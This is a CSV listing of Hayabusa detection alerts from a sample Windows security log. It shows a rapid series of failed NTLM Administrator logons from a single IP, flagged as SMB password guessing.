2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
